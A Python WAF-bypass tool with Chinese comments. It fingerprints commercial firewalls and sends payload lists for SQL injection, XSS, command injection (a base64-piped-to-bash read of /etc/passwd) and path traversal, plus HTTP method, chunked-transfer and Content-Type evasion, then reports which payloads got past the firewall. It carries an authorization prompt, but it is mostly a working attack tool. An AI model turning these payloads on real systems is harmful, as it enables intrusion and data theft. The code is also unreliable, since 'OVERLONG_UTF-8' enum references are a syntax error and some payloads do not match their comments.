#!/usr/bin/env python3
"""
Purpose: WAF 绕过自动化测试工具
         支持：指纹识别、编码绕过、协议走私、HTTP 参数污染、分块传输、Unicode 绕过
Auth: 仅限授权使用 — 未经书面授权禁止对任何目标执行测试
Dependencies: requests, urllib3, colorama
Usage:
    python waf_bypass_tester.py -u "http://target/page" --detect-waf
    python waf_bypass_tester.py -u "http://target/page" --test-all --param id
"""

import argparse
import logging
import re
import sys
import time
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict, List, Optional, Tuple

import requests
from urllib.parse import urlencode, urlparse, urlunparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


class BypassTechnique(Enum):
    """绕过技术分类"""
    ENCODING = "encoding"                  # 编码绕过
    CASE_VARIATION = "case_variation"      # 大小写变体
    COMMENT_INSERTION = "comment_insertion"  # 注释插入
    UNICODE = "unicode"                    # Unicode 绕过
    DOUBLE_ENCODING = "double_encoding"    # 双重编码
    HTTP_PARAMETER = "http_parameter"      # HTTP 参数污染
    CHUNKED_TRANSFER = "chunked_transfer"  # 分块传输
    CONTENT_TYPE = "content_type"          # Content-Type 变体
    HTTP_METHOD = "http_method"            # HTTP 方法绕过
    PROTOCOL = "protocol"                  # 协议层绕过
    NULL_BYTE = "null_byte"                # 空字节注入
    OVERLONG_UTF8 = "overlong_utf8"       # 超长 UTF-8


class WAFVendor(Enum):
    """WAF 厂商"""
    CLOUDFLARE = "Cloudflare"
    AWS_WAF = "AWS WAF"
    AKAMAI = "Akamai"
    IMPERVA = "Imperva (Incapsula)"
    F5_BIGIP = "F5 BIG-IP"
    MOD_SECURITY = "ModSecurity"
    BARRACUDA = "Barracuda"
    FORTIWEB = "FortiWeb"
    SUCURI = "Sucuri"
    WORDFENCE = "Wordfence"
    UNKNOWN = "Unknown"


@dataclass
class BypassResult:
    """绕过测试结果"""
    technique: BypassTechnique
    payload: str
    bypassed: bool
    waf_vendor: Optional[WAFVendor] = None
    original_blocked: bool = False
    bypass_status_code: Optional[int] = None
    bypass_response_length: Optional[int] = None
    notes: str = ""


@dataclass
class WAFInfo:
    """WAF 信息"""
    detected: bool = False
    vendor: WAFVendor = WAFVendor.UNKNOWN
    confidence: float = 0.0
    signatures: List[str] = field(default_factory=list)
    response_headers: Dict[str, str] = field(default_factory=dict)
    block_status_codes: List[int] = field(default_factory=list)


@dataclass
class TestConfig:
    """测试配置"""
    target_url: str
    parameter: str = "id"
    method: str = "GET"
    timeout: int = 10
    delay: float = 0.5
    proxy: Optional[str] = None
    verify_ssl: bool = False
    user_agent: str = "WAFBypassTester/1.0"
    cookie: Optional[str] = None
    headers: Optional[Dict[str, str]] = None


# ============================================================
# WAF 指纹数据库
# ============================================================

WAF_FINGERPRINTS: Dict[WAFVendor, Dict] = {
    WAFVendor.CLOUDFLARE: {
        "headers": ["cf-ray", "cf-cache-status", "server: cloudflare"],
        "cookies": ["__cflb", "__cfuid"],
        "block_codes": [403, 503],
        "block_body": ["error 1020", "access denied", "blocked by cloudflare"],
        "confidence": 0.95,
    },
    WAFVendor.AWS_WAF: {
        "headers": ["x-amzn-requestid", "x-amz-cf-id", "server: amazonaws"],
        "cookies": ["aws-waf-token"],
        "block_codes": [403],
        "block_body": ["access denied", "forbidden"],
        "confidence": 0.85,
    },
    WAFVendor.AKAMAI: {
        "headers": ["x-akamai", "akamai", "server: akamaighost"],
        "cookies": ["akamai_"],
        "block_codes": [403],
        "block_body": ["access denied", "the requested url was rejected"],
        "confidence": 0.90,
    },
    WAFVendor.IMPERVA: {
        "headers": ["x-iinfo", "x-cdn: imperva"],
        "cookies": ["visid_incap_", "incap_ses_", "nlbi_"],
        "block_codes": [403, 999],
        "block_body": ["access denied", "blocked by imperva"],
        "confidence": 0.92,
    },
    WAFVendor.F5_BIGIP: {
        "headers": ["x-wa-info", "server: bigip", "f5-"],
        "cookies": ["bigipserver", "ts_", "f5_"],
        "block_codes": [403],
        "block_body": ["the requested url was rejected", "support id"],
        "confidence": 0.88,
    },
    WAFVendor.MOD_SECURITY: {
        "headers": ["server: apache", "x-mod-security"],
        "cookies": [],
        "block_codes": [403, 406, 501],
        "block_body": ["mod_security", "modsecurity", "this error was generated by mod_security", "not acceptable"],
        "confidence": 0.80,
    },
    WAFVendor.BARRACUDA: {
        "headers": [" barracuda_", "barra_counter_session"],
        "cookies": ["barra_counter_session"],
        "block_codes": [403, 413],
        "block_body": ["barracuda", "you have been blocked"],
        "confidence": 0.85,
    },
    WAFVendor.FORTIWEB: {
        "headers": ["server: fortiweb", "x-fortiweb"],
        "cookies": ["FORTIWAFSID"],
        "block_codes": [403],
        "block_body": ["blocked by fortiweb", "access denied"],
        "confidence": 0.88,
    },
    WAFVendor.SUCURI: {
        "headers": ["server: sucuri", "x-sucuri"],
        "cookies": ["sucuri_cloudproxy_"],
        "block_codes": [403],
        "block_body": ["access denied", "sucuri", "you have been blocked"],
        "confidence": 0.90,
    },
    WAFVendor.WORDFENCE: {
        "headers": ["server: apache"],
        "cookies": ["wordfence_verifiedHuman"],
        "block_codes": [403, 503],
        "block_body": ["wordfence", "generated by wordfence", "your access to this site has been limited"],
        "confidence": 0.85,
    },
}

# ============================================================
# 绕过 Payload 数据库
# ============================================================

# SQL 注入绕过 payload
SQLI_BYPASS_PAYLOADS: Dict[BypassTechnique, List[str]] = {
    BypassTechnique.ENCODING: [
        # URL 编码
        "%27%20OR%201%3D1--",
        "%27%20UNION%20SELECT%20NULL--",
        # 双重 URL 编码
        "%2527%2520OR%25201%253D1--",
        # HTML 实体编码
        "' OR 1=1--",
        "&#39; OR 1=1--",
        # 十六进制编码
        "0x27204f5220313d312d2d",
    ],
    BypassTechnique.CASE_VARIATION: [
        "' Or 1=1--",
        "' oR 1=1--",
        "' OR 1=1--",
        "' uNiOn SeLeCt NuLl--",
        "' UNION/**/SELECT/**/NULL--",
    ],
    BypassTechnique.COMMENT_INSERTION: [
        "'/**/OR/**/1=1--",
        "'/*!OR*/1=1--",
        "'/*!50000OR*/1=1--",
        "'/*!UNION*//*!SELECT*/NULL--",
        "'/*!50000UNION*//*!50000SELECT*/NULL--",
        "/*!50000UnIoN*/SeLeCt",
    ],
    BypassTechnique.UNICODE: [
        # Unicode 全角字符
        "'\uff2f\uff32 1=1--",  # ＯＲ
        "'%ef%bc%8f%ef%bc%92 1=1--",
        # Unicode 编码
        "\\u0027 OR 1=1--",
        "' OR 1=1--",  # 不间断空格
    ],
    BypassTechnique.DOUBLE_ENCODING: [
        "%2527%2520OR%25201%253D1--",
        "%252527%252520OR%2525201%25253D1--",
    ],
    BypassTechnique.HTTP_PARAMETER: [
        # HPP (HTTP Parameter Pollution)
        "id=1' OR 1=1--&id=1",
        "id=1&id=1' OR 1=1--",
    ],
    BypassTechnique.NULL_BYTE: [
        "'%00OR 1=1--",
        "'\x00OR 1=1--",
        "%00' OR 1=1--",
    ],
    BypassTechnique.OVERLONG_UTF-8: [
        # 超长 UTF-8 编码
        "%c0%27 OR 1=1--",
        "%e0%80%27 OR 1=1--",
        "%f0%80%80%27 OR 1=1--",
    ],
}

# XSS 绕过 payload
XSS_BYPASS_PAYLOADS: Dict[BypassTechnique, List[str]] = {
    BypassTechnique.ENCODING: [
        # URL 编码
        "%3Cscript%3Ealert(1)%3C/script%3E",
        # HTML 实体编码
        "&lt;script&gt;alert(1)&lt;/script&gt;",
        "&#60;script&#62;alert(1)&#60;/script&#62;",
        # JavaScript 编码
        "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
    ],
    BypassTechnique.CASE_VARIATION: [
        "<ScRiPt>alert(1)</ScRiPt>",
        "<sCrIpT>alert(1)</sCrIpT>",
        "<IMG SRC=x ONERROR=alert(1)>",
        "<svg ONLOAD=alert(1)>",
    ],
    BypassTechnique.COMMENT_INSERTION: [
        "<scr<!-- -->ipt>alert(1)</scr<!-- -->ipt>",
        "<scr/**/ipt>alert(1)</scr/**/ipt>",
        "<img src=x on<!-- -->error=alert(1)>",
    ],
    BypassTechnique.UNICODE: [
        # Unicode 全角
        "＜script＞alert(1)＜/script＞",
        # 零宽字符
        "<scr\u200bipt>alert(1)</scr\u200bipt>",
        "<img src=x on\u200berror=alert(1)>",
    ],
    BypassTechnique.NULL_BYTE: [
        "<scri%00pt>alert(1)</scri%00pt>",
        "<img src=x onerror=%00alert(1)>",
        "%00<script>alert(1)</script>",
    ],
    BypassTechnique.CONTENT_TYPE: [
        # Content-Type 变体
        "application/x-www-form-urlencoded",
        "multipart/form-data",
        "text/plain",
    ],
}

# 命令注入绕过 payload
CMDI_BYPASS_PAYLOADS: Dict[BypassTechnique, List[str]] = {
    BypassTechnique.ENCODING: [
        # URL 编码
        "%3B%20cat%20/etc/passwd",
        # Base64
        "; echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash",
    ],
    BypassTechnique.CASE_VARIATION: [
        "; CaT /etc/passwd",
        "; cAt /eTc/pAsSwD",
    ],
    BypassTechnique.COMMENT_INSERTION: [
        ";/*/cat/*/etc/passwd",
        ";cat/*/etc/*/passwd",
    ],
    BypassTechnique.UNICODE: [
        # Unicode 全角
        "；cat /etc/passwd",
    ],
    BypassTechnique.NULL_BYTE: [
        ";%00cat /etc/passwd",
        ";cat%00 /etc/passwd",
    ],
}

# 路径遍历绕过 payload
PATH_TRAVERSAL_BYPASS: Dict[BypassTechnique, List[str]] = {
    BypassTechnique.ENCODING: [
        # URL 编码
        "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        # 双重编码
        "%252e%252e%252f",
        # Unicode 编码
        "..%c0%af..%c0%afetc%c0%afpasswd",
        # 16-bit Unicode
        "..%u002f..%u002fetc%u002fpasswd",
    ],
    BypassTechnique.CASE_VARIATION: [
        "../../../etc/passwd",
        "..\\..\\..\\windows\\system32\\config\\sam",
    ],
    BypassTechnique.NULL_BYTE: [
        "../../../etc/passwd%00",
        "..%00/../etc/passwd",
    ],
    BypassTechnique.OVERLONG_UTF-8: [
        "..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
        "..%e0%80%af..%e0%80%afetc%e0%80%afpasswd",
    ],
}


class WAFBypasser:
    """WAF 绕过测试器核心类"""

    def __init__(self, config: TestConfig):
        self.config = config
        self.session = requests.Session()
        self.waf_info = WAFInfo()
        self.results: List[BypassResult] = []
        self._setup_session()

    def _setup_session(self):
        """配置 HTTP 会话"""
        self.session.verify = self.config.verify_ssl
        self.session.headers.update({"User-Agent": self.config.user_agent})
        if self.config.cookie:
            self.session.headers.update({"Cookie": self.config.cookie})
        if self.config.headers:
            self.session.headers.update(self.config.headers)
        if self.config.proxy:
            self.session.proxies = {"http": self.config.proxy, "https": self.config.proxy}

    def detect_waf(self) -> WAFInfo:
        """检测 WAF 指纹"""
        logging.info("[*] 检测 WAF...")

        # 发送正常请求
        normal_resp = self._send_request("test_value")
        if normal_resp is None:
            logging.error("[!] 无法连接目标")
            return self.waf_info

        # 发送攻击 payload 触发 WAF
        attack_resp = self._send_request("' OR 1=1--")
        if attack_resp is None:
            return self.waf_info

        # 分析响应头
        headers_str = " ".join([f"{k}: {v}" for k, v in attack_resp.headers.items()]).lower()
        cookies_str = " ".join([f"{k}={v}" for k, v in attack_resp.cookies.items()]).lower()
        body_lower = attack_resp.text.lower()

        for vendor, fingerprint in WAF_FINGERPRINTS.items():
            matches = 0
            total_checks = 0

            # 检查响应头
            for sig in fingerprint["headers"]:
                total_checks += 1
                if sig.lower() in headers_str:
                    matches += 1
                    self.waf_info.signatures.append(f"Header: {sig}")

            # 检查 Cookie
            for sig in fingerprint["cookies"]:
                total_checks += 1
                if sig.lower() in cookies_str:
                    matches += 1
                    self.waf_info.signatures.append(f"Cookie: {sig}")

            # 检查状态码
            if attack_resp.status_code in fingerprint["block_codes"]:
                matches += 1
                self.waf_info.block_status_codes.append(attack_resp.status_code)

            # 检查响应体
            for sig in fingerprint["block_body"]:
                total_checks += 1
                if sig.lower() in body_lower:
                    matches += 1
                    self.waf_info.signatures.append(f"Body: {sig}")

            # 计算置信度
            if total_checks > 0:
                confidence = matches / total_checks
                if confidence > 0.3:  # 阈值
                    self.waf_info.detected = True
                    self.waf_info.vendor = vendor
                    self.waf_info.confidence = confidence
                    break

        if self.waf_info.detected:
            logging.info(f"[+] WAF 检测: {self.waf_info.vendor.value} (置信度: {self.waf_info.confidence:.1%})")
            for sig in self.waf_info.signatures[:5]:
                logging.info(f"    特征: {sig}")
        else:
            logging.info("[-] 未检测到 WAF 或 WAF 未拦截")

        return self.waf_info

    def test_sqli_bypass(self) -> List[BypassResult]:
        """测试 SQL 注入绕过"""
        logging.info("[*] 测试 SQL 注入绕过...")
        return self._test_bypass_payloads(SQLI_BYPASS_PAYLOADS, "SQLi")

    def test_xss_bypass(self) -> List[BypassResult]:
        """测试 XSS 绕过"""
        logging.info("[*] 测试 XSS 绕过...")
        return self._test_bypass_payloads(XSS_BYPASS_PAYLOADS, "XSS")

    def test_cmdi_bypass(self) -> List[BypassResult]:
        """测试命令注入绕过"""
        logging.info("[*] 测试命令注入绕过...")
        return self._test_bypass_payloads(CMDI_BYPASS_PAYLOADS, "CMDi")

    def test_path_traversal_bypass(self) -> List[BypassResult]:
        """测试路径遍历绕过"""
        logging.info("[*] 测试路径遍历绕过...")
        return self._test_bypass_payloads(PATH_TRAVERSAL_BYPASS, "Path Traversal")

    def test_http_method_bypass(self) -> List[BypassResult]:
        """测试 HTTP 方法绕过"""
        logging.info("[*] 测试 HTTP 方法绕过...")
        results = []

        methods = ["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS", "HEAD", "TRACE", "CONNECT"]
        attack_payload = "' OR 1=1--"

        for method in methods:
            try:
                if method == "GET":
                    resp = self.session.get(
                        self.config.target_url,
                        params={self.config.parameter: attack_payload},
                        timeout=self.config.timeout,
                    )
                else:
                    resp = self.session.request(
                        method,
                        self.config.target_url,
                        data={self.config.parameter: attack_payload},
                        timeout=self.config.timeout,
                    )

                bypassed = resp.status_code == 200 and len(resp.text) > 500
                if bypassed:
                    logging.info(f"  [+] HTTP 方法绕过: {method}")

                results.append(BypassResult(
                    technique=BypassTechnique.HTTP_METHOD,
                    payload=f"{method} {attack_payload}",
                    bypassed=bypassed,
                    waf_vendor=self.waf_info.vendor,
                    bypass_status_code=resp.status_code,
                    bypass_response_length=len(resp.text),
                ))

            except requests.RequestException:
                pass
            time.sleep(self.config.delay)

        return results

    def test_chunked_transfer(self) -> List[BypassResult]:
        """测试分块传输绕过"""
        logging.info("[*] 测试分块传输绕过...")
        results = []

        attack_payload = "' OR 1=1--"

        # 标准分块传输
        try:
            headers = {
                "Transfer-Encoding": "chunked",
                "Content-Type": "application/x-www-form-urlencoded",
            }
            # 手动构造分块数据
            body_parts = []
            for i, char in enumerate(attack_payload):
                body_parts.append(f"1\r\n{char}\r\n")
            body_parts.append("0\r\n\r\n")
            chunked_body = "".join(body_parts)

            resp = self.session.post(
                self.config.target_url,
                data=chunked_body,
                headers=headers,
                timeout=self.config.timeout,
            )

            bypassed = resp.status_code == 200 and len(resp.text) > 500
            results.append(BypassResult(
                technique=BypassTechnique.CHUNKED_TRANSFER,
                payload=f"Chunked: {attack_payload}",
                bypassed=bypassed,
                waf_vendor=self.waf_info.vendor,
                bypass_status_code=resp.status_code,
                bypass_response_length=len(resp.text),
            ))

        except requests.RequestException:
            pass

        return results

    def test_content_type_bypass(self) -> List[BypassResult]:
        """测试 Content-Type 绕过"""
        logging.info("[*] 测试 Content-Type 绕过...")
        results = []

        content_types = [
            "application/x-www-form-urlencoded",
            "multipart/form-data",
            "text/plain",
            "application/json",
            "application/xml",
            "text/xml",
        ]

        attack_payload = "' OR 1=1--"

        for ct in content_types:
            try:
                headers = {"Content-Type": ct}
                resp = self.session.post(
                    self.config.target_url,
                    data={self.config.parameter: attack_payload},
                    headers=headers,
                    timeout=self.config.timeout,
                )

                bypassed = resp.status_code == 200 and len(resp.text) > 500
                if bypassed:
                    logging.info(f"  [+] Content-Type 绕过: {ct}")

                results.append(BypassResult(
                    technique=BypassTechnique.CONTENT_TYPE,
                    payload=f"Content-Type: {ct}",
                    bypassed=bypassed,
                    waf_vendor=self.waf_info.vendor,
                    bypass_status_code=resp.status_code,
                    bypass_response_length=len(resp.text),
                ))

            except requests.RequestException:
                pass
            time.sleep(self.config.delay)

        return results

    # ----------------------------------------------------------
    # 辅助方法
    # ----------------------------------------------------------

    def _test_bypass_payloads(self, payloads: Dict[BypassTechnique, List[str]], attack_type: str) -> List[BypassResult]:
        """测试绕过 payload"""
        results = []

        for technique, payload_list in payloads.items():
            for payload in payload_list:
                bypassed, status_code, resp_length = self._test_single_payload(payload)

                if bypassed:
                    logging.info(f"  [+] {attack_type} 绕过成功: {technique.value} - {payload[:50]}...")

                results.append(BypassResult(
                    technique=technique,
                    payload=payload,
                    bypassed=bypassed,
                    waf_vendor=self.waf_info.vendor,
                    bypass_status_code=status_code,
                    bypass_response_length=resp_length,
                ))

                time.sleep(self.config.delay)

        return results

    def _test_single_payload(self, payload: str) -> Tuple[bool, Optional[int], Optional[int]]:
        """测试单个 payload"""
        try:
            resp = self._send_request(payload)

            if resp is None:
                return False, None, None

            # 判断是否绕过
            # 条件1: 状态码不是 403/406/501/503
            # 条件2: 响应长度 > 500（排除空响应/错误页面）
            # 条件3: 响应中不包含 WAF 拦截特征
            blocked_codes = [403, 406, 501, 503]
            body_lower = resp.text.lower()
            block_indicators = ["access denied", "forbidden", "blocked", "rejected", "waf", "firewall"]

            is_blocked = (
                resp.status_code in blocked_codes or
                any(ind in body_lower for ind in block_indicators)
            )

            return not is_blocked, resp.status_code, len(resp.text)

        except requests.RequestException:
            return False, None, None

    def _send_request(self, payload: str) -> Optional[requests.Response]:
        """发送带 payload 的请求"""
        time.sleep(self.config.delay)
        try:
            if self.config.method.upper() == "GET":
                return self.session.get(
                    self.config.target_url,
                    params={self.config.parameter: payload},
                    timeout=self.config.timeout,
                )
            else:
                return self.session.post(
                    self.config.target_url,
                    data={self.config.parameter: payload},
                    timeout=self.config.timeout,
                )
        except requests.RequestException as e:
            logging.debug(f"Request failed: {e}")
            return None

    def print_results(self):
        """格式化输出结果"""
        if not self.results:
            print("\n[-] 无测试结果")
            return

        print(f"\n{'='*60}")
        print("  WAF 绕过测试报告")
        print(f"{'='*60}")

        # WAF 信息
        if self.waf_info.detected:
            print(f"\n  WAF 厂商: {self.waf_info.vendor.value}")
            print(f"  置信度: {self.waf_info.confidence:.1%}")
            if self.waf_info.signatures:
                print(f"  特征: {', '.join(self.waf_info.signatures[:3])}")

        # 绕过结果
        bypass_count = sum(1 for r in self.results if r.bypassed)
        print(f"\n  总测试: {len(self.results)} | 绕过成功: {bypass_count}")

        if bypass_count > 0:
            print(f"\n  {'='*40}")
            print("  成功绕过的 Payload:")
            print(f"  {'='*40}")
            for r in self.results:
                if r.bypassed:
                    print(f"\n  ✅ [{r.technique.value}] {r.payload[:80]}")
                    print(f"     状态码: {r.bypass_status_code} | 响应长度: {r.bypass_response_length}")

        print(f"\n{'='*60}")

    def export_json(self, filepath: str):
        """导出 JSON 报告"""
        import json
        data = {
            "waf_info": {
                "detected": self.waf_info.detected,
                "vendor": self.waf_info.vendor.value if self.waf_info.detected else None,
                "confidence": self.waf_info.confidence,
                "signatures": self.waf_info.signatures,
            },
            "total_tests": len(self.results),
            "bypass_count": sum(1 for r in self.results if r.bypassed),
            "results": [
                {
                    "technique": r.technique.value,
                    "payload": r.payload,
                    "bypassed": r.bypassed,
                    "status_code": r.bypass_status_code,
                    "response_length": r.bypass_response_length,
                    "notes": r.notes,
                }
                for r in self.results
            ],
        }
        with open(filepath, "w", encoding="utf-8") as f:
            json.dump(data, f, ensure_ascii=False, indent=2)
        logging.info(f"[+] JSON 报告已导出: {filepath}")


def main():
    parser = argparse.ArgumentParser(
        description="WAF 绕过自动化测试工具（仅限授权使用）",
        epilog="⚠️  未经授权使用本工具属于违法行为"
    )
    parser.add_argument("-u", "--url", required=True, help="目标 URL")
    parser.add_argument("-p", "--parameter", default="id", help="待测参数名")
    parser.add_argument("-m", "--method", default="GET", choices=["GET", "POST"])
    parser.add_argument("--detect-waf", action="store_true", help="仅检测 WAF")
    parser.add_argument("--test-sqli", action="store_true", help="测试 SQL 注入绕过")
    parser.add_argument("--test-xss", action="store_true", help="测试 XSS 绕过")
    parser.add_argument("--test-cmdi", action="store_true", help="测试命令注入绕过")
    parser.add_argument("--test-path", action="store_true", help="测试路径遍历绕过")
    parser.add_argument("--test-method", action="store_true", help="测试 HTTP 方法绕过")
    parser.add_argument("--test-chunked", action="store_true", help="测试分块传输绕过")
    parser.add_argument("--test-content-type", action="store_true", help="测试 Content-Type 绕过")
    parser.add_argument("--test-all", action="store_true", help="测试所有绕过技术")
    parser.add_argument("--proxy", help="代理地址")
    parser.add_argument("--cookie", help="Cookie 字符串")
    parser.add_argument("-o", "--output", help="输出 JSON 报告路径")

    args = parser.parse_args()

    print("⚠️  请确认你已获得目标系统的书面授权")
    confirm = input("确认已获授权？(y/N): ")
    if confirm.lower() != "y":
        sys.exit(0)

    config = TestConfig(
        target_url=args.url,
        parameter=args.parameter,
        method=args.method,
        proxy=args.proxy,
        cookie=args.cookie,
    )

    bypasser = WAFBypasser(config)

    # 检测 WAF
    bypasser.detect_waf()

    if args.detect_waf:
        bypasser.print_results()
        return

    # 测试绕过
    if args.test_all or args.test_sqli:
        bypasser.results.extend(bypasser.test_sqli_bypass())

    if args.test_all or args.test_xss:
        bypasser.results.extend(bypasser.test_xss_bypass())

    if args.test_all or args.test_cmdi:
        bypasser.results.extend(bypasser.test_cmdi_bypass())

    if args.test_all or args.test_path:
        bypasser.results.extend(bypasser.test_path_traversal_bypass())

    if args.test_all or args.test_method:
        bypasser.results.extend(bypasser.test_http_method_bypass())

    if args.test_all or args.test_chunked:
        bypasser.results.extend(bypasser.test_chunked_transfer())

    if args.test_all or args.test_content_type:
        bypasser.results.extend(bypasser.test_content_type_bypass())

    bypasser.print_results()

    if args.output:
        bypasser.export_json(args.output)


if __name__ == "__main__":
    main()
